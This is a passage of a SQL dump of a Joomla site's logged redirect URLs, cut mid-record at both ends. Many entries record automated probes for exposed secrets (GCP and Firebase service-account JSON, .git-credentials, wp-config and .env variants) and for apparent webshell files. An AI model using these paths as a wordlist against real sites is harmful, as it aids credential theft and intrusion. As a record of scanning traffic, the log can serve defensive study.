00:00:00',301),(65708,'http://3s-technologies.com.tr/en/wp-content/plugins/custom-facebook-feed',NULL,'','',1,0,'2026-05-22 17:29:29','0000-00-00 00:00:00',301),(65709,'http://3s-technologies.com.tr/en/wp-content/plugins/feed-them-social',NULL,'','',1,0,'2026-05-22 17:29:29','0000-00-00 00:00:00',301),(65710,'http://3s-technologies.com.tr/en/wp-content/plugins/spotlight-social-photo-feeds',NULL,'','',1,0,'2026-05-22 17:29:30','0000-00-00 00:00:00',301),(65711,'http://3s-technologies.com.tr/en/wp-content/plugins/twitter-feed',NULL,'','',1,0,'2026-05-22 17:29:30','0000-00-00 00:00:00',301),(65712,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-twitter-feeds',NULL,'','',1,0,'2026-05-22 17:29:31','0000-00-00 00:00:00',301),(65713,'http://3s-technologies.com.tr/en/wp-content/plugins/woo-gutenberg-products-block',NULL,'','',1,0,'2026-05-22 17:29:31','0000-00-00 00:00:00',301),(65714,'http://3s-technologies.com.tr/en/wp-content/plugins/gutenberg',NULL,'','',1,0,'2026-05-22 17:29:32','0000-00-00 00:00:00',301),(65715,'http://3s-technologies.com.tr/en/wp-content/plugins/disable-gutenberg',NULL,'','',1,0,'2026-05-22 17:29:32','0000-00-00 00:00:00',301),(65716,'http://3s-technologies.com.tr/en/wp-content/plugins/classic-widgets',NULL,'','',1,0,'2026-05-22 17:29:33','0000-00-00 00:00:00',301),(65717,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/advanced-cache.php',NULL,'','',1,0,'2026-05-22 17:29:34','0000-00-00 00:00:00',301),(65718,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/object-cache.php',NULL,'','',1,0,'2026-05-22 17:29:34','0000-00-00 00:00:00',301),(65719,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/wpengine-common',NULL,'','',1,0,'2026-05-22 17:29:35','0000-00-00 00:00:00',301),(65720,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/pantheon-mu-plugin',NULL,'','',1,0,'2026-05-22 17:29:35','0000-00-00 00:00:00',301),(65721,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/kinsta-mu-plugins',NULL,'','',1,0,'2026-05-22 17:29:36','0000-00-00 00:00:00',301),(65722,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/siteground-migrator',NULL,'','',1,0,'2026-05-22 17:29:36','0000-00-00 00:00:00',301),(65723,'http://3s-technologies.com.tr/en/wp-content/languages/plugins',NULL,'','',1,0,'2026-05-22 17:29:37','0000-00-00 00:00:00',301),(65724,'http://3s-technologies.com.tr/en/wp-content/languages/themes',NULL,'','',1,0,'2026-05-22 17:29:37','0000-00-00 00:00:00',301),(65725,'http://3s-technologies.com.tr/en/wp-content/languages/admin',NULL,'','',1,0,'2026-05-22 17:29:38','0000-00-00 00:00:00',301),(65726,'http://3s-technologies.com.tr/en/wp-languages',NULL,'','',1,0,'2026-05-22 17:29:38','0000-00-00 00:00:00',301),(65727,'http://3s-technologies.com.tr/en/wp-content/upgrade-temp-backup',NULL,'','',1,0,'2026-05-22 17:29:39','0000-00-00 00:00:00',301),(65728,'http://3s-technologies.com.tr/en/wp-content/upgrade/plugins',NULL,'','',1,0,'2026-05-22 17:29:39','0000-00-00 00:00:00',301),(65729,'http://3s-technologies.com.tr/en/wp-content/upgrade/themes',NULL,'','',1,0,'2026-05-22 17:29:40','0000-00-00 00:00:00',301),(65730,'http://3s-technologies.com.tr/en/wp-content/upgrade/languages',NULL,'','',1,0,'2026-05-22 17:29:40','0000-00-00 00:00:00',301),(65731,'http://3s-technologies.com.tr/en/wp-admin/erase-personal-data',NULL,'','',1,0,'2026-05-22 17:29:44','0000-00-00 00:00:00',301),(65732,'http://3s-technologies.com.tr/en/wp-admin/privacy-policy',NULL,'','',1,0,'2026-05-22 17:29:44','0000-00-00 00:00:00',301),(65733,'http://3s-technologies.com.tr/en/wp-admin/site-health',NULL,'','',1,0,'2026-05-22 17:29:45','0000-00-00 00:00:00',301),(65734,'http://3s-technologies.com.tr/en/wp-content/cache/page_enhanced',NULL,'','',1,0,'2026-05-22 17:29:46','0000-00-00 00:00:00',301),(65735,'http://3s-technologies.com.tr/en/wp-content/cache/minify',NULL,'','',1,0,'2026-05-22 17:29:46','0000-00-00 00:00:00',301),(65736,'http://3s-technologies.com.tr/en/wp-content/cache/wp-rocket',NULL,'','',1,0,'2026-05-22 17:29:46','0000-00-00 00:00:00',301),(65737,'http://3s-technologies.com.tr/en/wp-content/cache/litespeed',NULL,'','',1,0,'2026-05-22 17:29:47','0000-00-00 00:00:00',301),(65738,'http://3s-technologies.com.tr/en/wp-content/cache/autoptimize',NULL,'','',1,0,'2026-05-22 17:29:47','0000-00-00 00:00:00',301),(65739,'http://3s-technologies.com.tr/en/wp-content/cache/asset-cleanup',NULL,'','',1,0,'2026-05-22 17:29:48','0000-00-00 00:00:00',301),(65740,'http://3s-technologies.com.tr/en/wp-content/uploads/cache',NULL,'','',1,0,'2026-05-22 17:29:48','0000-00-00 00:00:00',301),(65741,'http://3s-technologies.com.tr/en/wp-content/uploads/et-cache',NULL,'','',1,0,'2026-05-22 17:29:49','0000-00-00 00:00:00',301),(65742,'http://3s-technologies.com.tr/en/wp-content/uploads/elementor',NULL,'','',1,0,'2026-05-22 17:29:49','0000-00-00 00:00:00',301),(65743,'http://3s-technologies.com.tr/en/wp-content/uploads/siteorigin-widgets',NULL,'','',1,0,'2026-05-22 17:29:51','0000-00-00 00:00:00',301),(65744,'http://3s-technologies.com.tr/en/the-joomla-shop.html',NULL,'','',1,0,'2026-05-22 19:21:48','0000-00-00 00:00:00',301),(65745,'http://3s-technologies.com.tr/en/blogs/community.html',NULL,'','',1,0,'2026-05-23 00:42:47','0000-00-00 00:00:00',301),(65746,'http://3s-technologies.com.tr/en/blogs.html',NULL,'','',1,0,'2026-05-23 07:54:03','0000-00-00 00:00:00',301),(65747,'https://3s-technologies.com.tr/en/config/service-account.json',NULL,'https://3s-technologies.com.tr/config/service-account.json','',2,0,'2026-05-23 09:00:46','0000-00-00 00:00:00',301),(65748,'https://3s-technologies.com.tr/en/firebase-adminsdk.json',NULL,'https://3s-technologies.com.tr/firebase-adminsdk.json','',5,0,'2026-05-23 09:00:46','0000-00-00 00:00:00',301),(65749,'https://3s-technologies.com.tr/en/gcp-service-account.json',NULL,'https://3s-technologies.com.tr/gcp-service-account.json','',2,0,'2026-05-23 09:00:47','0000-00-00 00:00:00',301),(65750,'https://3s-technologies.com.tr/en/config/credentials.json',NULL,'https://3s-technologies.com.tr/config/credentials.json','',2,0,'2026-05-23 09:00:47','0000-00-00 00:00:00',301),(65751,'https://3s-technologies.com.tr/en/gcp-credentials.json',NULL,'https://3s-technologies.com.tr/gcp-credentials.json','',5,0,'2026-05-23 09:00:47','0000-00-00 00:00:00',301),(65752,'https://3s-technologies.com.tr/en/api/client_secret.json',NULL,'https://3s-technologies.com.tr/api/client_secret.json','',2,0,'2026-05-23 09:00:48','0000-00-00 00:00:00',301),(65753,'https://3s-technologies.com.tr/en/firebase.json',NULL,'https://3s-technologies.com.tr/firebase.json','',2,0,'2026-05-23 09:00:48','0000-00-00 00:00:00',301),(65754,'https://3s-technologies.com.tr/en/application_default_credentials.json',NULL,'https://3s-technologies.com.tr/application_default_credentials.json','',5,0,'2026-05-23 09:00:48','0000-00-00 00:00:00',301),(65755,'https://3s-technologies.com.tr/en/key.json',NULL,'https://3s-technologies.com.tr/key.json','',5,0,'2026-05-23 09:00:48','0000-00-00 00:00:00',301),(65756,'https://3s-technologies.com.tr/en/keyfile.json',NULL,'https://3s-technologies.com.tr/keyfile.json','',5,0,'2026-05-23 09:00:48','0000-00-00 00:00:00',301),(65757,'https://3s-technologies.com.tr/en/sa-key.json',NULL,'https://3s-technologies.com.tr/sa-key.json','',2,0,'2026-05-23 09:00:50','0000-00-00 00:00:00',301),(65758,'https://3s-technologies.com.tr/en/client_secrets.json',NULL,'https://3s-technologies.com.tr/client_secrets.json','',2,0,'2026-05-23 09:00:50','0000-00-00 00:00:00',301),(65759,'https://3s-technologies.com.tr/en/client_secret.json',NULL,'https://3s-technologies.com.tr/client_secret.json','',2,0,'2026-05-23 09:00:50','0000-00-00 00:00:00',301),(65760,'https://3s-technologies.com.tr/en/firebase-credentials.json',NULL,'https://3s-technologies.com.tr/firebase-credentials.json','',2,0,'2026-05-23 09:00:50','0000-00-00 00:00:00',301),(65761,'https://3s-technologies.com.tr/en/app/credentials.json',NULL,'https://3s-technologies.com.tr/app/credentials.json','',2,0,'2026-05-23 09:00:50','0000-00-00 00:00:00',301),(65762,'https://3s-technologies.com.tr/en/google-credentials.json',NULL,'https://3s-technologies.com.tr/google-credentials.json','',5,0,'2026-05-23 09:00:50','0000-00-00 00:00:00',301),(65763,'http://3s-technologies.com.tr/en/events/event-resources-list.html',NULL,'','',1,0,'2026-05-23 11:33:38','0000-00-00 00:00:00',301),(65764,'http://3s-technologies.com.tr/en/events/official-joomla-events-charter.html',NULL,'','',1,0,'2026-05-23 12:38:15','0000-00-00 00:00:00',301),(65765,'http://3s-technologies.com.tr/tr/php-health.php',NULL,'','',1,0,'2026-05-23 16:15:26','0000-00-00 00:00:00',301),(65766,'http://3s-technologies.com.tr/tr/mailer_dsn.php',NULL,'','',1,0,'2026-05-23 16:15:28','0000-00-00 00:00:00',301),(65767,'http://3s-technologies.com.tr/tr/symlink403.php',NULL,'','',1,0,'2026-05-23 16:15:32','0000-00-00 00:00:00',301),(65768,'http://3s-technologies.com.tr/tr/phpmailer.php',NULL,'','',1,0,'2026-05-23 16:15:35','0000-00-00 00:00:00',301),(65769,'http://3s-technologies.com.tr/tr/view_info.php',NULL,'','',1,0,'2026-05-23 16:15:35','0000-00-00 00:00:00',301),(65770,'http://3s-technologies.com.tr/tr/test.php1',NULL,'','',1,0,'2026-05-23 16:15:38','0000-00-00 00:00:00',301),(65771,'http://3s-technologies.com.tr/tr/eviltwin.php',NULL,'','',1,0,'2026-05-23 16:15:40','0000-00-00 00:00:00',301),(65772,'http://3s-technologies.com.tr/tr/site_info.php',NULL,'','',1,0,'2026-05-23 16:15:40','0000-00-00 00:00:00',301),(65773,'http://3s-technologies.com.tr/tr/cache-base.php',NULL,'','',1,0,'2026-05-23 16:15:41','0000-00-00 00:00:00',301),(65774,'http://3s-technologies.com.tr/tr/isadmin.php',NULL,'','',1,0,'2026-05-23 16:15:42','0000-00-00 00:00:00',301),(65775,'http://3s-technologies.com.tr/tr/discover.php',NULL,'','',1,0,'2026-05-23 16:15:43','0000-00-00 00:00:00',301),(65776,'http://3s-technologies.com.tr/tr/.env.save.php',NULL,'','',1,0,'2026-05-23 16:15:44','0000-00-00 00:00:00',301),(65777,'http://3s-technologies.com.tr/tr/server_ping.php',NULL,'','',1,0,'2026-05-23 16:15:46','0000-00-00 00:00:00',301),(65778,'http://3s-technologies.com.tr/tr/localconf.php',NULL,'','',1,0,'2026-05-23 16:15:47','0000-00-00 00:00:00',301),(65779,'http://3s-technologies.com.tr/tr/submit-contact-form.php',NULL,'','',1,0,'2026-05-23 16:15:47','0000-00-00 00:00:00',301),(65780,'http://3s-technologies.com.tr/tr/ajaxfilemanager.php',NULL,'','',1,0,'2026-05-23 16:15:49','0000-00-00 00:00:00',301),(65781,'http://3s-technologies.com.tr/tr/test_info5.php',NULL,'','',1,0,'2026-05-23 16:15:51','0000-00-00 00:00:00',301),(65782,'http://3s-technologies.com.tr/tr/installed.php',NULL,'','',1,0,'2026-05-23 16:15:53','0000-00-00 00:00:00',301),(65783,'http://3s-technologies.com.tr/tr/test-page.php',NULL,'','',1,0,'2026-05-23 16:15:56','0000-00-00 00:00:00',301),(65784,'http://3s-technologies.com.tr/tr/nfxxuaa.php',NULL,'','',1,0,'2026-05-23 16:15:57','0000-00-00 00:00:00',301),(65785,'http://3s-technologies.com.tr/tr/00_server_info.php',NULL,'','',1,0,'2026-05-23 16:15:58','0000-00-00 00:00:00',301),(65786,'http://3s-technologies.com.tr/tr/check-site.php',NULL,'','',1,0,'2026-05-23 16:16:02','0000-00-00 00:00:00',301),(65787,'http://3s-technologies.com.tr/tr/configuration_check.php',NULL,'','',1,0,'2026-05-23 16:16:04','0000-00-00 00:00:00',301),(65788,'http://3s-technologies.com.tr/tr/wp-config.development.php',NULL,'','',1,0,'2026-05-23 16:16:07','0000-00-00 00:00:00',301),(65789,'http://3s-technologies.com.tr/tr/check-info.php',NULL,'','',1,0,'2026-05-23 16:16:08','0000-00-00 00:00:00',301),(65790,'http://3s-technologies.com.tr/tr/php-verification.php',NULL,'','',1,0,'2026-05-23 16:16:11','0000-00-00 00:00:00',301),(65791,'http://3s-technologies.com.tr/tr/php-diag.php',NULL,'','',1,0,'2026-05-23 16:16:12','0000-00-00 00:00:00',301),(65792,'http://3s-technologies.com.tr/tr/ajaxemail.php',NULL,'','',1,0,'2026-05-23 16:16:14','0000-00-00 00:00:00',301),(65793,'http://3s-technologies.com.tr/tr/info.php.txt',NULL,'','',1,0,'2026-05-23 16:16:16','0000-00-00 00:00:00',301),(65794,'http://3s-technologies.com.tr/tr/a2b_entity_backup.php',NULL,'','',1,0,'2026-05-23 16:16:17','0000-00-00 00:00:00',301),(65795,'http://3s-technologies.com.tr/tr/mysqli.php',NULL,'','',1,0,'2026-05-23 16:16:18','0000-00-00 00:00:00',301),(65796,'http://3s-technologies.com.tr/tr/srvinfo.php',NULL,'','',1,0,'2026-05-23 16:16:19','0000-00-00 00:00:00',301),(65797,'http://3s-technologies.com.tr/tr/_phpinfo.php',NULL,'','',1,0,'2026-05-23 16:16:20','0000-00-00 00:00:00',301),(65798,'http://3s-technologies.com.tr/tr/env.testing.php',NULL,'','',1,0,'2026-05-23 16:16:21','0000-00-00 00:00:00',301),(65799,'http://3s-technologies.com.tr/tr/test02.php',NULL,'','',1,0,'2026-05-23 16:16:23','0000-00-00 00:00:00',301),(65800,'http://3s-technologies.com.tr/tr/wp-config.php6',NULL,'','',1,0,'2026-05-23 16:16:23','0000-00-00 00:00:00',301),(65801,'http://3s-technologies.com.tr/tr/siapa.php',NULL,'','',1,0,'2026-05-23 16:16:25','0000-00-00 00:00:00',301),(65802,'http://3s-technologies.com.tr/tr/channels.php',NULL,'','',1,0,'2026-05-23 16:16:25','0000-00-00 00:00:00',301),(65803,'http://3s-technologies.com.tr/tr/example.php',NULL,'','',1,0,'2026-05-23 16:16:26','0000-00-00 00:00:00',301),(65804,'http://3s-technologies.com.tr/tr/.qiofetme.php',NULL,'','',1,0,'2026-05-23 16:16:29','0000-00-00 00:00:00',301),(65805,'http://3s-technologies.com.tr/tr/minipriv.php',NULL,'','',1,0,'2026-05-23 16:16:32','0000-00-00 00:00:00',301),(65806,'http://3s-technologies.com.tr/tr/cal_search.php',NULL,'','',1,0,'2026-05-23 16:16:33','0000-00-00 00:00:00',301),(65807,'http://3s-technologies.com.tr/tr/.wp-db.php',NULL,'','',1,0,'2026-05-23 16:16:34','0000-00-00 00:00:00',301),(65808,'http://3s-technologies.com.tr/tr/wpm.php',NULL,'','',1,0,'2026-05-23 16:16:34','0000-00-00 00:00:00',301),(65809,'http://3s-technologies.com.tr/tr/defines.php',NULL,'','',1,0,'2026-05-23 16:16:35','0000-00-00 00:00:00',301),(65810,'http://3s-technologies.com.tr/tr/php-config.php',NULL,'','',1,0,'2026-05-23 16:16:37','0000-00-00 00:00:00',301),(65811,'http://3s-technologies.com.tr/tr/.phpinfo',NULL,'','',1,0,'2026-05-23 16:16:39','0000-00-00 00:00:00',301),(65812,'http://3s-technologies.com.tr/tr/dev-wp-config.php',NULL,'','',1,0,'2026-05-23 16:16:43','0000-00-00 00:00:00',301),(65813,'http://3s-technologies.com.tr/tr/cors.php',NULL,'','',1,0,'2026-05-23 16:16:44','0000-00-00 00:00:00',301),(65814,'http://3s-technologies.com.tr/tr/secret_keys.php',NULL,'','',1,0,'2026-05-23 16:16:47','0000-00-00 00:00:00',301),(65815,'http://3s-technologies.com.tr/tr/201.php',NULL,'','',3,0,'2026-05-23 17:10:55','0000-00-00 00:00:00',301),(65816,'http://3s-technologies.com.tr/tr/ops.php',NULL,'','',3,0,'2026-05-23 17:10:56','0000-00-00 00:00:00',301),(65817,'http://3s-technologies.com.tr/tr/ingfo.php',NULL,'','',3,0,'2026-05-23 17:10:57','0000-00-00 00:00:00',301),(65818,'http://3s-technologies.com.tr/tr/cxl.php',NULL,'','',1,0,'2026-05-23 17:12:27','0000-00-00 00:00:00',301),(65819,'http://3s-technologies.com.tr/tr/dtox.php',NULL,'','',1,0,'2026-05-23 17:12:29','0000-00-00 00:00:00',301),(65820,'http://3s-technologies.com.tr/tr/crypto.php',NULL,'','',1,0,'2026-05-23 17:12:40','0000-00-00 00:00:00',301),(65821,'http://3s-technologies.com.tr/tr/mail3.php',NULL,'','',1,0,'2026-05-23 17:12:41','0000-00-00 00:00:00',301),(65822,'http://3s-technologies.com.tr/tr/cgf.php',NULL,'','',1,0,'2026-05-23 17:13:05','0000-00-00 00:00:00',301),(65823,'http://3s-technologies.com.tr/tr/mmrp.php',NULL,'','',1,0,'2026-05-23 17:13:06','0000-00-00 00:00:00',301),(65824,'http://3s-technologies.com.tr/tr/forx.php',NULL,'','',1,0,'2026-05-23 17:13:07','0000-00-00 00:00:00',301),(65825,'http://3s-technologies.com.tr/tr/sid4.php',NULL,'','',1,0,'2026-05-23 17:13:08','0000-00-00 00:00:00',301),(65826,'http://3s-technologies.com.tr/tr/askg.php',NULL,'','',1,0,'2026-05-23 17:13:08','0000-00-00 00:00:00',301),(65827,'http://3s-technologies.com.tr/en/blogs/leadership.html',NULL,'','',1,0,'2026-05-23 23:16:49','0000-00-00 00:00:00',301),(65828,'http://3s-technologies.com.tr/tr/wp-test.php',NULL,'','',2,0,'2026-05-24 00:42:55','0000-00-00 00:00:00',301),(65829,'http://3s-technologies.com.tr/tr/wp-indx.php',NULL,'','',2,0,'2026-05-24 00:42:59','0000-00-00 00:00:00',301),(65830,'http://3s-technologies.com.tr/tr/wp-link-spm.php',NULL,'','',2,0,'2026-05-24 00:43:00','0000-00-00 00:00:00',301),(65831,'http://3s-technologies.com.tr/tr/wp-link-snpm.php',NULL,'','',2,0,'2026-05-24 00:43:03','0000-00-00 00:00:00',301),(65832,'http://3s-technologies.com.tr/tr/wehrman.php',NULL,'','',2,0,'2026-05-24 04:10:51','0000-00-00 00:00:00',301),(65833,'http://3s-technologies.com.tr/tr/wp-der.php',NULL,'','',2,0,'2026-05-24 04:10:57','0000-00-00 00:00:00',301),(65834,'http://3s-technologies.com.tr/tr/wp-wz.php',NULL,'','',2,0,'2026-05-24 04:11:09','0000-00-00 00:00:00',301),(65835,'http://3s-technologies.com.tr/tr/wp-sing.php',NULL,'','',2,0,'2026-05-24 04:11:22','0000-00-00 00:00:00',301),(65836,'http://3s-technologies.com.tr/en/archive.html',NULL,'','',1,0,'2026-05-24 09:57:59','0000-00-00 00:00:00',301),(65837,'http://3s-technologies.com.tr/en/sponsorship-campaigns/sponsors.html',NULL,'','',1,0,'2026-05-24 15:50:08','0000-00-00 00:00:00',301),(65838,'https://3s-technologies.com.tr/tr/.git-credentials',NULL,'','',2,0,'2026-05-24 23:09:00','0000-00-00 00:00:00',301),(65839,'https://3s-technologies.com.tr/en/sa.json',NULL,'','',3,0,'2026-05-24 23:14:00','0000-00-00 00:00:00',301),(65840,'https://3s-technologies.com.tr/en/gcp-key.json',NULL,'','',3,0,'2026-05-24 23:14:01','0000-00-00 00:00:00',301),(65841,'https://3s-technologies.com.tr/en/gcp-sa.json',NULL,'','',3,0,'2026-05-24 23:14:05','0000-00-00 00:00:00',301),(65842,'https://3s-technologies.com.tr/en/google-key.json',NULL,'','',3,0,'2026-05-24 23:14:09','0000-00-00 00:00:00',301),(65843,'https://3s-technologies.com.tr/en/.config/gcloud/application_default_credentials.json',NULL,'','',3,0,'2026-05-24 23:14:10','0000-00-00 00:00:00',301),(65844,'https://3s-technologies.com.tr/en/firebase-key.json',NULL,'','',3,0,'2026-05-24 23:14:30','0000-00-00 00:00:00',301),(65845,'https://3s-technologies.com.tr/en/gcloud-service-key.json',NULL,'','',2,0,'2026-05-24 23:14:35','0000-00-00 00:00:00',301),(65846,'https://3s-technologies.com.tr/en/service_account.json',NULL,'','',2,0,'2026-05-24 23:14:37','0000-00-00 00:00:00',301),(65847,'https://3s-technologies.com.tr/en/gcp_key.json',NULL,'','',2,0,'2026-05-24 23:14:39','0000-00-00 00:00:00',301),(65848,'https://3s-technologies.com.tr/en/cloud-key.json',NULL,'','',2,0,'2026-05-24 23:14:41','0000-00-00 00:00:00',301),(65849,'http://3s-technologies.com.tr/en/login.html',NULL,'','',1,0,'2026-05-24 23:30:04','0000-00-00 00:00:00',301),(65850,'http://3s-technologies.com.tr/en/user-groups.html',NULL,'','',1,0,'2026-05-25 02:23:52','0000-00-00 00:00:00',301),(65851,'http://3s-technologies.com.tr/en/helpdesk/dashboard.html',NULL,'','',1,0,'2026-05-25 09:53:05','0000-00-00 00:00:00',301),(65852,'http://3s-technologies.com.tr/en/helpdesk/user-groups-support/registration/submit-ticket.html',NULL,'','',1,0,'2026-05-25 11:17:34','0000-00-00 00:00:00',301),(65853,'https://3s-technologies.com.tr/tr/sitemap/sitemap.xml',NULL,'','',2,0,'2026-05-26 06:23:35','0000-00-00 00:00:00',301),(65854,'https://3s-technologies.com.tr/tr/modules/smartblog/sitemap.xml',NULL,'','',2,0,'2026-05-26 06:23:36','0000-00-00 00:00:00',301),(65855,'https://3s-technologies.com.tr/tr/modules/prestablog/sitemap.xml',NULL,'','',2,0,'2026-05-26 06:23:36','0000-00-00 00:00:00',301),(65856,'https://3s-technologies.com.tr/tr/blog-sitemap.xml',NULL,'','',2,0,'2026-05-26 06:23:37','0000-00-00 00:00:00',301),(65857,'https://3s-technologies.com.tr/en/ürünler/screen-printer',NULL,'','',1,0,'2026-05-27 23:56:03','0000-00-00 00:00:00',301),(65858,'http://mail.3s-technologies.com.tr/tr/aaf.php',NULL,'','',1,0,'2026-05-28 07:40:49','0000-00-00 00:00:00',301),(65859,'http://mail.3s-technologies.com.tr/tr/tw0.php',NULL,'','',1,0,'2026-05-28 07:40:50','0000-00-00 00:00:00',301),(65860,'http://mail.3s-technologies.com.tr/tr/htt.php',NULL,'','',1,0,'2026-05-28 07:40:51','0000-00-00 00:00:00',301),(65861,'http://mail.3s-technologies.com.tr/tr/eid.php',NULL,'','',1,0,'2026-05-28 07:40:52','0000-00-00 00:00:00',301),(65862,'http://mail.3s-technologies.com.tr/tr/hellcut.php',NULL,'','',1,0,'2026-05-28 07:40:53','0000-00-00 00:00:00',301),(65863,'http://mail.3s-technologies.com.tr/tr/tdd.php',NULL,'','',1,0,'2026-05-28 07:40:54','0000-00-00 00:00:00',301),(65864,'http://mail.3s-technologies.com.tr/tr/201.php',NULL,'','',1,0,'2026-05-28 07:40:58','0000-00-00 00:00:00',301),(65865,'http://mail.3s-technologies.com.tr/tr/ops.php',NULL,'','',1,0,'2026-05-28 07:40:59','0000-00-00 00:00:00',301),(65866,'http://mail.3s-technologies.com.tr/tr/ingfo.php',NULL,'','',1,0,'2026-05-28 07:41:01','0000-00-00 00:00:00',301),(65867,'http://mail.3s-technologies.com.tr/tr/c55cdler.php',NULL,'','',1,0,'2026-05-28 07:41:02','0000-00-00 00:00:00',301),(65868,'http://mail.3s-technologies.com.tr/tr/xenon1337.php',NULL,'','',1,0,'2026-05-28 07:41:03','0000-00-00 00:00:00',301),(65869,'http://mail.3s-technologies.com.tr/tr/test11.php',NULL,'','',1,0,'2026-05-28 07:41:05','0000-00-00 00:00:00',301),(65870,'http://mail.3s-technologies.com.tr/tr/koala.php',NULL,'','',1,0,'2026-05-28 07:41:06','0000-00-00 00:00:00',301),(65871,'http://mail.3s-technologies.com.tr/tr/mac.php',NULL,'','',1,0,'2026-05-28 07:41:07','0000-00-00 00:00:00',301),(65872,'http://mail.3s-technologies.com.tr/tr/wp-includes/blocks/post-comments-form',NULL,'','',1,0,'2026-05-28 07:41:11','0000-00-00 00:00:00',301),(65873,'http://mail.3s-technologies.com.tr/tr/half.php',NULL,'','',1,0,'2026-05-28 07:41:14','0000-00-00 00:00:00',301),(65874,'http://mail.3s-technologies.com.tr/tr/wordpress/wp-admin/maint',NULL,'','',1,0,'2026-05-28 07:41:17','0000-00-00 00:00:00',301),(65875,'http://mail.3s-technologies.com.tr/tr/wp-content/bypassbest.php',NULL,'','',1,0,'2026-05-28 07:42:12','0000-00-00 00:00:00',301),(65876,'http://mail.3s-technologies.com.tr/tr/als.php',NULL,'','',1,0,'2026-05-28 07:42:20','0000-00-00 00:00:00',301),(65877,'http://mail.3s-technologies.com.tr/tr/pol.php',NULL,'','',1,0,'2026-05-28 07:42:21','0000-00-00 00:00:00',301),(65878,'http://mail.3s-technologies.com.tr/tr/xamp.php',NULL,'','',1,0,'2026-05-28 07:42:33','0000-00-00 00:00:00',301),(65879,'http://mail.3s-technologies.com.tr/tr/ca3bhikvhgp.php',NULL,'','',1,0,'2026-05-28 07:42:34','0000-00-00 00:00:00',301),(65880,'http://mail.3s-technologies.com.tr/tr/clas11.php',NULL,'','',1,0,'2026-05-28 07:42:35','0000-00-00 00:00:00',301),(65881,'http://mail.3s-technologies.com.tr/tr/file41.php',NULL,'','',1,0,'2026-05-28 07:42:40','0000-00-00 00:00:00',301),(65882,'http://mail.3s-technologies.com.tr/tr/file81.php',NULL,'','',1,0,'2026-05-28 07:42:48','0000-00-00 00:00:00',301),(65883,'http://mail.3s-technologies.com.tr/tr/jj.php',NULL,'','',1,0,'2026-05-28 07:43:00','0000-00-00 00:00:00',301),(65884,'http://mail.3s-technologies.com.tr/tr/waf.php',NULL,'','',1,0,'2026-05-28 07:43:00','0000-00-00 00:00:00',301),(65885,'http://3s-technologies.com.tr/tr/aaf.php',NULL,'','',2,0,'2026-05-28 08:50:19','0000-00-00 00:00:00',301),(65886,'http://3s-technologies.com.tr/tr/tw0.php',NULL,'','',2,0,'2026-05-28 08:50:20','0000-00-00 00:00:00',301),(65887,'http://3s-technologies.com.tr/tr/htt.php',NULL,'','',2,0,'2026-05-28 08:50:21','0000-00-00 00:00:00',301),(65888,'http://3s-technologies.com.tr/tr/eid.php',NULL,'','',2,0,'2026-05-28 08:50:22','0000-00-00 00:00:00',301),(65889,'http://3s-technologies.com.tr/tr/hellcut.php',NULL,'','',2,0,'2026-05-28 08:50:23','0000-00-00 00:00:00',301),(65890,'http://3s-technologies.com.tr/tr/tdd.php',NULL,'','',2,0,'2026-05-28 08:50:25','0000-00-00 00:00:00',301),(65891,'http://3s-technologies.com.tr/tr/file41.php',NULL,'','',2,0,'2026-05-28 08:52:31','0000-00-00 00:00:00',301),(65892,'http://3s-technologies.com.tr/tr/file81.php',NULL,'','',2,0,'2026-05-28 08:52:39','0000-00-00 00:00:00',301),(65893,'http://3s-technologies.com.tr/tr/alr.php',NULL,'','',1,0,'2026-05-28 18:19:13','0000-00-00 00:00:00',301),(65894,'http://3s-technologies.com.tr/tr/da.php',NULL,'','',1,0,'2026-05-28 18:19:17','0000-00-00 00:00:00',301),(65895,'http://3s-technologies.com.tr/tr/cvngrth.php',NULL,'','',1,0,'2026-05-28 18:19:23','0000-00-00 00:00:00',301),(65896,'http://3s-technologies.com.tr/tr/consultantx/wp-config.php',NULL,'','',1,0,'2026-05-28 21:25:58','0000-00-00 00:00:00',301),(65897,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-upgrader-skin.php',NULL,'','',1,0,'2026-05-28 21:25:59','0000-00-00 00:00:00',301),(65898,'http://3s-technologies.com.tr/tr/themes/kale/404.php',NULL,'','',1,0,'2026-05-28 21:25:59','0000-00-00 00:00:00',301),(65899,'http://3s-technologies.com.tr/tr/themes/kale/header.php',NULL,'','',1,0,'2026-05-28 21:26:00','0000-00-00 00:00:00',301),(65900,'http://3s-technologies.com.tr/tr/consultantx/wp-includes/class-wp-hook.php',NULL,'','',1,0,'2026-05-28 21:26:01','0000-00-00 00:00:00',301),(65901,'http://3s-technologies.com.tr/tr/themes/wp-yellow-hats/woocommerce/archive-product.php',NULL,'','',1,0,'2026-05-28 21:26:02','0000-00-00 00:00:00',301),(65902,'http://3s-technologies.com.tr/tr/wp-content/plugins/multiple-domain/multipledomain.php',NULL,'','',1,0,'2026-05-28 21:26:03','0000-00-00 00:00:00',301),(65903,'http://3s-technologies.com.tr/tr/consultantx/wp-includes/plugin.php',NULL,'','',1,0,'2026-05-28 21:26:04','0000-00-00 00:00:00',301),(65904,'http://3s-technologies.com.tr/tr/themes/wp-yellow-hats/404.php',NULL,'','',1,0,'2026-05-28 21:26:04','0000-00-00 00:00:00',301),(65905,'http://3s-technologies.com.tr/tr/vendor/tf_updater/index.php',NULL,'','',1,0,'2026-05-28 21:26:05','0000-00-00 00:00:00',301),(65906,'http://3s-technologies.com.tr/tr/wp-content/themes/woostify/functions.php',NULL,'','',1,0,'2026-05-28 21:26:06','0000-00-00 00:00:00',301),(65907,'http://3s-technologies.com.tr/tr/wp-content/plugins/updraftplus/class-updraftplus.php',NULL,'','',1,0,'2026-05-28 21:26:07','0000-00-00 00:00:00',301),(65908,'http://3s-technologies.com.tr/tr/bd2024/classes/hook.php',NULL,'','',1,0,'2026-05-28 21:26:07','0000-00-00 00:00:00',301),(65909,'http://3s-technologies.com.tr/tr/themes/hestia/404.php',NULL,'','',1,0,'2026-05-28 21:26:08','0000-00-00 00:00:00',301),(65910,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/woocommerce.php',NULL,'','',1,0,'2026-05-28 21:26:09','0000-00-00 00:00:00',301),(65911,'http://3s-technologies.com.tr/tr/slicemap.php',NULL,'','',1,0,'2026-05-28 21:26:10','0000-00-00 